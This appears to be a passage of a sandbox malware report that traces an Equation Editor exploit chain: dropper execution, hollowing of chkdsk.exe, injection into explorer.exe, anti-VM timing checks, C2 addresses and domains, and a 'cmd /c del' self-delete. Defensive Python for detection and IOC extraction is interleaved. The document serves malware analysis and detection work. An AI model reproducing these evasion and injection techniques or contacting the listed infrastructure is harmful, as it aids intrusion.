Source: C:\Windows\SysWOW64\chkdsk.exe | RDTSC instruction interceptor: First address: 00000000000C9904 second address: 00000000000C990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe | RDTSC instruction interceptor: First address: 00000000000C9B6E second address: 00000000000C9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess graph_2-178
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess graph_6-22967
Source: C:\Windows\explorer.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_8-13950
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1712 | Thread sleep time: -180000s >= -30000s
Source: C:\Windows\explorer.exe TID: 1344 | Thread sleep count: 70 > 30
Source: C:\Windows\explorer.exe TID: 2696 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\explorer.exe TID: 1340 | Thread sleep time: -480000s >= -30000s
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 1488 | Thread sleep count: 441 > 30
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 1488 | Thread sleep time: -882000s >= -30000s
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 1488 | Thread sleep count: 9529 > 30
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 1488 | Thread sleep time: -19058000s >= -30000s
Source: C:\Windows\SysWOW64\chkdsk.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\chkdsk.exe | Last function: Thread delayed
Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 1511
Source: C:\Windows\SysWOW64\chkdsk.exe | Window / User API: threadDelayed 441
Source: C:\Windows\SysWOW64\chkdsk.exe | Window / User API: threadDelayed 9529
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_00409AA0 rdtsc 7_2_00409AA0
Source: C:\Users\user\AppData\Roaming\word.exe | API call chain: ExitProcess graph end node graph_5-3463
Source: explorer.exe, 00000008.00000002.849552627.00000000001D6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
Source: explorer.exe, 00000008.00000000.413347575.0000000003E59000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000008.00000002.850269711.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000008.00000000.413347575.0000000003E59000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}eeab7790
Source: explorer.exe, 00000008.00000002.849943461.00000000025E0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0a
Source: explorer.exe, 00000008.00000000.413347575.0000000003E59000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}100\4&20
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 6_2_002407DA GetSystemInfo, 6_2_002407DA
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00405E93 FindFirstFileA,FindClose, 5_2_00405E93
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 5_2_004054BD
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00402671 FindFirstFileA, 5_2_00402671
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 6_2_004016D0 FindFirstFileW,FindNextFileW,FindClose, 6_2_004016D0
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 6_2_0042478A FindFirstFileExW, 6_2_0042478A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036BBABB mov edx, dword ptr fs:[00000030h] 2_2_036BBABB
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 6_2_0024005F mov eax, dword ptr fs:[00000030h] 6_2_0024005F
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 6_2_0024013E mov eax, dword ptr fs:[00000030h] 6_2_0024013E
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 6_2_00240109 mov eax, dword ptr fs:[00000030h] 6_2_00240109
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 6_2_0024017B mov eax, dword ptr fs:[00000030h] 6_2_0024017B
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_007200EA mov eax, dword ptr fs:[00000030h] 7_2_007200EA
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_00720080 mov ecx, dword ptr fs:[00000030h] 7_2_00720080
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_007426F8 mov eax, dword ptr fs:[00000030h] 7_2_007426F8
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_02000080 mov ecx, dword ptr fs:[00000030h] 10_2_02000080
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_020000EA mov eax, dword ptr fs:[00000030h] 10_2_020000EA
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_020226F8 mov eax, dword ptr fs:[00000030h] 10_2_020226F8
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\chkdsk.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 6_2_004100BC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_004100BC
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 6_2_0042194B GetProcessHeap, 6_2_0042194B
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_00409AA0 rdtsc 7_2_00409AA0
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\chkdsk.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0040ACE0 LdrLoadDll, 7_2_0040ACE0
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 6_2_0041024E SetUnhandledExceptionFilter, 6_2_0041024E
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 6_2_004100BC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_004100BC
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 6_2_0041046C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_0041046C
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 6_2_00414847 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00414847
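The four "RDTSC instruction interceptor" rows above record the same six-byte sequence (rdtsc; xor ecx, ecx; add ecx, eax; rdtsc) twice in oktuxvhtsq.exe (0x409904/0x40990A and 0x409B6E/0x409B74) and again, relocated by 0x340000, in the hollowed chkdsk.exe (0xC9904/0xC990A and 0xC9B6E/0xC9B74): two time-stamp reads with nothing but register arithmetic between them, which is what a sandbox/VM timing check looks like and what profiling code never looks like. The Python below is an added example, not part of the Joe Sandbox report: it scans a code blob for RDTSC opcodes close enough together to be such a check and reports them as virtual addresses. The byte image is constructed (0xCC filler with one valid encoding of the disassembled sequence placed at the two offsets the report lists; the report shows mnemonics only, so the exact bytes are an assumption), which is why the addresses it finds match the rows above.

```python
"""Static scan for back-to-back RDTSC timing checks (added example; constructed input)."""

RDTSC = b"\x0f\x31"

# One valid encoding of the sequence the sandbox disassembled (assumption: the
# report gives mnemonics, not bytes):
#   rdtsc            0F 31
#   xor ecx, ecx     31 C9
#   add ecx, eax     01 C1
#   rdtsc            0F 31
TIMING_CHECK = b"\x0f\x31\x31\xc9\x01\xc1\x0f\x31"


def build_constructed_image() -> bytes:
    """Constructed stand-in for the dropper's code: int3 filler with the timing
    check at the two offsets (relative to image base 0x400000) the report lists."""
    code = bytearray(b"\xcc" * 0xA000)
    for offset in (0x9904, 0x9B6E):
        code[offset:offset + len(TIMING_CHECK)] = TIMING_CHECK
    return bytes(code)


def find_rdtsc_pairs(code: bytes, base_va: int, max_gap: int = 32):
    """Return [(first_va, second_va), ...] for every pair of consecutive RDTSC
    opcodes at most max_gap bytes apart. base_va is the virtual address of
    code[0], so a raw .text dump can be scanned by passing that section's VA."""
    hits = [i for i in range(len(code) - 1) if code[i:i + 2] == RDTSC]
    pairs = []
    for first, second in zip(hits, hits[1:]):
        if second - first <= max_gap:
            pairs.append((base_va + first, base_va + second))
    return pairs


def rebase(pairs, old_base: int, new_base: int):
    """Translate pair addresses to another load base, e.g. the 0xC0000 base at
    which the same code was mapped inside chkdsk.exe according to the report."""
    delta = new_base - old_base
    return [(first + delta, second + delta) for first, second in pairs]


if __name__ == "__main__":
    pairs = find_rdtsc_pairs(build_constructed_image(), 0x400000)
    for first, second in pairs:
        print(f"rdtsc pair {first:#010x} -> {second:#010x} (gap {second - first} bytes)")
    for first, second in rebase(pairs, 0x400000, 0xC0000):
        print(f"same check in the chkdsk.exe mapping: {first:#010x} -> {second:#010x}")
```

The scan is opcode-only, so 0F 31 inside an immediate or a data region will produce false pairs; treat a hit as a place to confirm with a disassembler, not as a verdict. The small gap is the discriminator: legitimate uses of RDTSC (profiling, seeding) read the counter once, or twice around real work, and a back-to-back pair followed by a comparison is the evasion pattern the sandbox flagged.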

          HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe | Network Connect: 103.224.212.212 80
Source: C:\Windows\explorer.exe | Network Connect: 206.188.193.211 80
Source: C:\Windows\explorer.exe | Domain query: www.credit-cards-16215.bond
Source: C:\Windows\explorer.exe | Domain query: www.luxpsy.com
Source: C:\Windows\explorer.exe | Domain query: www.centralngs.com
Source: C:\Windows\explorer.exe | Domain query: www.west-paws.com
Source: C:\Windows\explorer.exe | Domain query: www.miamirealestatecommercial.com
Source: C:\Windows\explorer.exe | Network Connect: 91.195.240.19 80
Source: C:\Windows\explorer.exe | Domain query: www.sxchenggu.com
Source: C:\Windows\explorer.exe | Network Connect: 38.11.36.68 80
Source: C:\Windows\explorer.exe | Domain query: www.narrativepages.com
Source: C:\Windows\explorer.exe | Domain query: www.pj69vip12.cyou
Source: C:\Windows\explorer.exe | Network Connect: 34.149.87.45 80
Source: C:\Windows\explorer.exe | Network Connect: 3.33.130.190 80
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\chkdsk.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\chkdsk.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 5E0000
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Thread register set: target process: 1244
Source: C:\Windows\SysWOW64\chkdsk.exe | Thread register set: target process: 1244
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
Source: C:\Users\user\AppData\Roaming\word.exe | Process created: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe "C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe"
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Process created: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe
Source: C:\Windows\SysWOW64\chkdsk.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe"
Source: explorer.exe, 00000008.00000000.412690106.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.849552627.00000000001D6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Progman-
Source: explorer.exe, 00000008.00000000.412885208.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.849683256.0000000000720000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 00000008.00000000.412885208.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.849683256.0000000000720000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000000.412885208.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.849683256.0000000000720000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: !Progman
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 6_2_004270EB
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: EnumSystemLocalesW, 6_2_004273E2
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: EnumSystemLocalesW, 6_2_00427397
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: EnumSystemLocalesW, 6_2_0042747D
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: GetLocaleInfoW, 6_2_0041E421
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 6_2_00427508
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: GetLocaleInfoW, 6_2_0042775B
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 6_2_00427884
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: GetLocaleInfoW, 6_2_0042798A
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 6_2_00427A60
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: EnumSystemLocalesW, 6_2_0041DF33
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 6_2_0040FF08 cpuid 6_2_0040FF08
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 6_2_0041030B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 6_2_0041030B
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 5_2_004030FB
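The "Process created" and "File created" rows in this report give the whole chain: EQNEDT32.EXE writes word.exe into %AppData% and launches it, word.exe drops and launches oktuxvhtsq.exe, which relaunches itself and injects into explorer.exe, and the hollowed chkdsk.exe finally runs cmd.exe /c del to remove the dropper. The Python below is an added example, not part of the Joe Sandbox report or of any vendor's product: it replays that chain as constructed Sysmon-style process-creation and file-creation events (plus one benign control event) and applies the detections a SOC would want from this page. The event shape (image, parent image, command line, target file) and the user-writable path markers are assumptions; map them onto your own telemetry fields.

```python
"""Detections for the EQNEDT32 -> dropper -> self-delete chain (added example; constructed events)."""
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessCreate:
    image: str
    parent_image: str
    command_line: str


@dataclass(frozen=True)
class FileCreate:
    image: str
    target: str


EQNEDT32 = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
WORD_EXE = r"C:\Users\user\AppData\Roaming\word.exe"
DROPPER = r"C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe"
EXPLORER = r"C:\Windows\explorer.exe"
CHKDSK = r"C:\Windows\SysWOW64\chkdsk.exe"

# Constructed events modelled on the report's process tree; the notepad event is a benign control.
PROCESS_EVENTS = [
    ProcessCreate(WORD_EXE, EQNEDT32, WORD_EXE),
    ProcessCreate(DROPPER, WORD_EXE, f'"{DROPPER}" '),
    ProcessCreate(DROPPER, DROPPER, DROPPER),
    ProcessCreate(CHKDSK, EXPLORER, CHKDSK),
    ProcessCreate(r"C:\Windows\SysWOW64\cmd.exe", CHKDSK, f'C:\\Windows\\SysWOW64\\cmd.exe /c del "{DROPPER}"'),
    ProcessCreate(r"C:\Windows\System32\notepad.exe", EXPLORER, "notepad.exe"),
]
FILE_EVENTS = [
    FileCreate(EQNEDT32, WORD_EXE),
    FileCreate(EQNEDT32, r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\jakatrol2.1[1].exe"),
    FileCreate(WORD_EXE, DROPPER),
]

# Assumed markers for user-writable drop locations; extend for your environment.
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\temporary internet files\\")
EXECUTABLE_EXT = (".exe", ".dll", ".scr", ".com")
DEL_RE = re.compile(r'/c\s+del\s+"?(?P<target>[^"]+?)"?\s*$', re.IGNORECASE)


def _name(path: str) -> str:
    return ntpath.basename(path).lower()


def _user_writable(path: str) -> bool:
    return any(marker in path.lower() for marker in USER_WRITABLE)


def detect(process_events, file_events):
    """Return (rule, severity, detail) tuples for every matching event."""
    alerts = []
    for ev in file_events:
        # Equation Editor renders OLE math objects; it has no business writing PE files.
        if _name(ev.image) == "eqnedt32.exe" and ev.target.lower().endswith(EXECUTABLE_EXT):
            alerts.append(("eqnedt32_writes_executable", "critical", ev.target))
    for ev in process_events:
        parent, child = _name(ev.parent_image), _name(ev.image)
        if parent == "eqnedt32.exe":
            # Any child of EQNEDT32.EXE means CVE-2017-11882 / CVE-2018-0802 style exploitation.
            alerts.append(("eqnedt32_child_process", "critical", ev.command_line))
        if child == "cmd.exe":
            match = DEL_RE.search(ev.command_line)
            if match and _user_writable(match["target"]):
                # "cmd /c del <file in a drop directory>" launched by a non-shell parent is dropper cleanup.
                alerts.append(("self_delete_dropped_file", "high", f"{parent} deleted {match['target']}"))
        if _user_writable(ev.image) and _user_writable(ev.parent_image):
            # Executable in a user-writable path launched by another such executable.
            alerts.append(("user_writable_exec_chain", "medium", f"{ev.parent_image} -> {ev.image}"))
    return alerts


if __name__ == "__main__":
    for rule, severity, detail in detect(PROCESS_EVENTS, FILE_EVENTS):
        print(f"[{severity}] {rule}: {detail}")
```

The first two rules are the ones worth paging on: EQNEDT32.EXE spawning anything or writing an executable has no benign explanation. The self-delete rule keys on the deleted path rather than on the parent name, so it also fires when the injected host is something other than chkdsk.exe; the network activity the report attributes to explorer.exe is deliberately not a rule here, because explorer.exe makes outbound connections on its own and that signal needs the injection context (the "Section loaded" and "Thread APC queued" rows above) to be actionable.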

          Stealing of Sensitive Information

Source: Yara match | File source: 00000006.00000002.411940280.0000000000240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 7.2.oktuxvhtsq.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.oktuxvhtsq.exe.260000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.oktuxvhtsq.exe.260000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.oktuxvhtsq.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.420688853.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.420828073.0000000002280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match |
 File source: 0000000A.00000002.849613102.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.849597547.00000000002F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

Source: Yara match | File source: 00000006.00000002.411940280.0000000000240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 7.2.oktuxvhtsq.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.oktuxvhtsq.exe.260000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.oktuxvhtsq.exe.260000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.oktuxvhtsq.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.420688853.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.420828073.0000000002280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.849613102.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.849597547.00000000002F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
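Turning this report into something a blocklist or a hunt can consume means pulling the C2 addresses and domain queries out of the "HIPS / PFW" rows, the dropped paths and commands out of the "File created" and "Process created" rows, and mapping each Yara-matched dump in the two sections above back to a process. The Python below is an added example, not part of the Joe Sandbox report: a parser for the row format used on this page, fed with rows copied from the page as constructed input. It handles both the flattened form in which the source path runs straight into the signature text with the link text still attached ("...explorer.exeNetwork Connect: ... Jump to behavior") and a " | "-separated form. The process-index table is read off the "Code function: N_2_..." rows of this report (2 = EQNEDT32.EXE, 5 = word.exe, 6 and 7 = the two oktuxvhtsq.exe instances, 8 = explorer.exe, 10 = chkdsk.exe); that the .sdmp prefix is hexadecimal follows from 0000000A matching chkdsk.exe's 10_2_ functions, while the decimal index in .unpack names is an assumption based on the 6.2 and 7.2 names here.

```python
"""Extract IOCs and Yara-hit process mappings from Joe Sandbox signature rows (added example)."""
import re

# Constructed input: rows copied from this report, one of them in the " | "-separated form.
REPORT_ROWS = [
    "Source: C:\\Windows\\explorer.exeNetwork Connect: 103.224.212.212 80Jump to behavior",
    "Source: C:\\Windows\\explorer.exe | Network Connect: 206.188.193.211 80",
    "Source: C:\\Windows\\explorer.exeDomain query: www.narrativepages.com",
    "Source: C:\\Windows\\explorer.exeDomain query: www.miamirealestatecommercial.com",
    "Source: C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXEFile created: C:\\Users\\user\\AppData\\Roaming\\word.exeJump to dropped file",
    "Source: C:\\Windows\\SysWOW64\\chkdsk.exeProcess created: C:\\Windows\\SysWOW64\\cmd.exe /c del \"C:\\Users\\user\\AppData\\Local\\Temp\\oktuxvhtsq.exe\"Jump to behavior",
    "Source: Yara matchFile source: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY",
    "Source: Yara matchFile source: 7.2.oktuxvhtsq.exe.400000.2.unpack, type: UNPACKEDPE",
    "Source: Yara matchFile source: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY",
]

# Process index -> image, read off this report's "Code function: N_2_..." rows.
PROCESS_INDEX = {2: "EQNEDT32.EXE", 5: "word.exe", 6: "oktuxvhtsq.exe",
                 7: "oktuxvhtsq.exe", 8: "explorer.exe", 10: "chkdsk.exe"}

LINK_RESIDUE = ("Jump to behavior", "Jump to dropped file")
KINDS = "Network Connect|Domain query|Process created|File created|File source"
ROW_RE = re.compile(rf"^Source: (?P<origin>.*?)(?: \| )?(?P<kind>{KINDS}): (?P<value>.*)$")
# <pid hex>.<phase>.<id>.<base VA>.<flags>... .sdmp
SDMP_RE = re.compile(r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<phase>\d{8})\.\d+\.(?P<base>[0-9A-Fa-f]{16})\.")
# <pid>.<phase>.<image>.<base VA>.<n>[.raw].unpack  (decimal pid: assumption)
UNPACK_RE = re.compile(r"^(?P<pid>\d+)\.(?P<phase>\d+)\.(?P<image>.+?)\.(?P<base>[0-9A-Fa-f]+)\.\d+(?:\.raw)?\.unpack$")


def strip_link_residue(value: str) -> str:
    for residue in LINK_RESIDUE:
        if value.endswith(residue):
            return value[:-len(residue)].rstrip()
    return value


def parse_row(row: str):
    """(origin, kind, value) for a signature row, or None if it is not one we extract."""
    match = ROW_RE.match(row)
    if not match:
        return None
    return match["origin"], match["kind"], strip_link_residue(match["value"])


def dump_location(file_source: str):
    """(process index, phase, base VA) for an .sdmp memory dump or an .unpack name."""
    name = file_source.split(",")[0].strip()
    match = SDMP_RE.match(name)
    if match:
        return int(match["pid"], 16), int(match["phase"]), int(match["base"], 16)
    match = UNPACK_RE.match(name)
    if match:
        return int(match["pid"]), int(match["phase"]), int(match["base"], 16)
    return None


def extract(rows):
    iocs = {"ips": set(), "domains": set(), "dropped": set(), "commands": [], "yara_hits": set()}
    for row in rows:
        parsed = parse_row(row)
        if parsed is None:
            continue
        origin, kind, value = parsed
        if kind == "Network Connect":
            ip, port = value.rsplit(" ", 1)
            iocs["ips"].add((ip, int(port)))
        elif kind == "Domain query":
            iocs["domains"].add(value)
        elif kind == "File created":
            iocs["dropped"].add((origin, value))
        elif kind == "Process created":
            iocs["commands"].append((origin, value))
        elif kind == "File source" and origin == "Yara match":
            location = dump_location(value)
            if location:
                pid, phase, base = location
                iocs["yara_hits"].add((PROCESS_INDEX.get(pid, f"process {pid}"), pid, phase, f"{base:#x}"))
    return iocs


if __name__ == "__main__":
    for key, items in extract(REPORT_ROWS).items():
        print(key, sorted(items, key=str))
```

The Yara mapping is the part worth keeping: the .sdmp for process 7 at 0x400000 and the 7.2.oktuxvhtsq.exe.400000.2.unpack file are the same payload, and the 0xC0000 dump in process 10 is that payload after it was written into chkdsk.exe, which is exactly where the "Section unmapped" and "Thread register set" rows say the hollowing took place. Domain queries on this page include the FormBook decoy domains that were contacted alongside the real C2, so treat the list as "observed", not as "confirmed malicious", before blocking.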
MITRE ATT&CK Matrix (the digits in front of a technique are the report's signature-count markers, kept as extracted; cells without digits are the matrix's fixed grid and indicate nothing observed)

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact | Resource Development | Reconnaissance |
